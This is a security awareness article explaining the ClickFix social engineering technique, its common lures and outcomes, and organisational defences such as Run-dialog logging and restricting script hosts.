What is ClickFix and How to Prevent It

ClickFix is a relatively new social engineering technique that is popular among threat actors, with a reported 517% surge in 2025, according to ESET data.

Sometimes referred to as ClearFix, the technique was first detected in April 2024 in campaigns conducted by an initial access broker tracked by Proofpoint as TA571.

It quickly gained popularity in 2024, with a wide range of malware being delivered using this method, including AsyncRAT, Danabot, DarkGate, Lumma Stealer, Matanbuchus and NetSupport.

ClickFix is a deceptive social engineering technique used by cybercriminals to manipulate victims into clicking on malicious links or downloading harmful files.

Unlike traditional phishing, which often relies on poorly crafted emails, ClickFix employs psychological tricks to create a sense of urgency, fear or curiosity, making victims more likely to act without thinking.

Attackers disguise their malicious content as legitimate notifications, software updates or security alerts, exploiting human instincts rather than technical vulnerabilities.

Threat actors begin by designing a message that appears trustworthy and urgent. This could be an email, a pop-up ad, a social media message or even a fake system alert.

The goal is to make the victim believe that immediate action is necessary. For example, a user might see a notification claiming their bank account has been compromised or that their computer is infected with malware.

These messages often mimic real communications from well-known companies, government agencies or tech support services, making them harder to distinguish from legitimate alerts.

Other known scenarios include:

• Browser unable to display the page, need to refresh the browser
• Error loading a document on a website
• Error opening a document from an email
• Problems with the microphone and camera in Google Meet or Zoom
• Users asked to prove that they are not a robot (fake CAPTCHA)

Once the victim encounters the message, the attacker uses psychological pressure to push them into clicking.

This could involve threats of account suspension, warnings of data loss or promises of rewards.

In most cases, the language is carefully crafted to bypass rational thinking, with phrases like "Act now to secure your account!" or "Your system is at risk!", thus triggering an emotional response and making the victim more likely to comply without questioning the source.

This technique is referred to as ClickFix because usually the notification contains a button enticing the user to ‘fix’ the situation – but some ClickFix schemes don’t use this element.

When the victim clicks the link or performs the action supposed to lead them to resolving the problem (e.g. downloading a file), the attack moves to the next stage.

Instead of providing the promised solution, the malicious payload is delivered. This could take several forms:

• Drive-by downloads: The victim is redirected to a compromised website that automatically installs malware without their knowledge
• Fake software installers: The victim is tricked into downloading what appears to be a legitimate program (like a browser update or antivirus tool), but it actually contains malware
• Credential harvesting: The victim is directed to a fake login page where their username and password are stolen
• Exploiting system vulnerabilities: Some ClickFix attacks use scripts (such as PowerShell commands) to execute malware directly on the victim’s machine

Once the malware is installed or credentials are stolen, the attacker can take various malicious actions:

• Persistent access: The attacker installs backdoors or remote access tools to maintain control over the victim’s system for future attacks
• Lateral movement: If the victim is part of an organization, the malware may spread to other devices on the same network, increasing the damage
• Ransomware deployment: The victim’s files are encrypted and a ransom demand is made for their release
• Data theft: Sensitive information, such as passwords, financial details or personal files, is extracted and sent to the attacker

To effectively prevent and mitigate the ClickFix threat, organizations need to raise awareness about this type of social engineering tactic among their workforce, with a particular emphasis on the importance of questioning unexpected prompts and verifying legitimacy before executing commands.

Just like with most cyber threats, organizations also need to keep their systems (software, browsers, etc.) up to date and respect basic security measures.

However, there are some specific measures organizations can take to mitigate threats like ClickFix and its variants:

• Monitor and log activity: Implement logging for the Run dialog and clipboard activities through Windows Event Viewer. Set up alerts for suspicious commands executed through user accounts
• Restrict use of run dialog and clipboard: Utilize Group Policy Objects (GPOs) to disable or limit access to the Windows Run dialog (Win + R) and restrict clipboard functionality to prevent unauthorized commands
• Restrict execution of potentially malicious executables: Block execution of commonly exploited binaries such as mshta.exe and powershell.exe from user directories to prevent the execution of potential malware delivered via ClickFix
• Block Malvertising: Employ solutions that can block malvertising and the display of deceptive ads, which may serve as distribution points for ClickFix campaigns
• Secure software and browser environments: Employ advanced URL filtering to block access to known malicious sites and redirect users away from compromised websites.
• Implement multifactor authentication (MFA)
• Deploy advanced security tools (eg. EDR, IDS, UEBA)
• Develop and maintain a robust incident response plan that includes procedures specific to handling ClickFix incidents

ADVERTISEMENT

Enjoyed this article? Make sure to share it!

Looking for something else?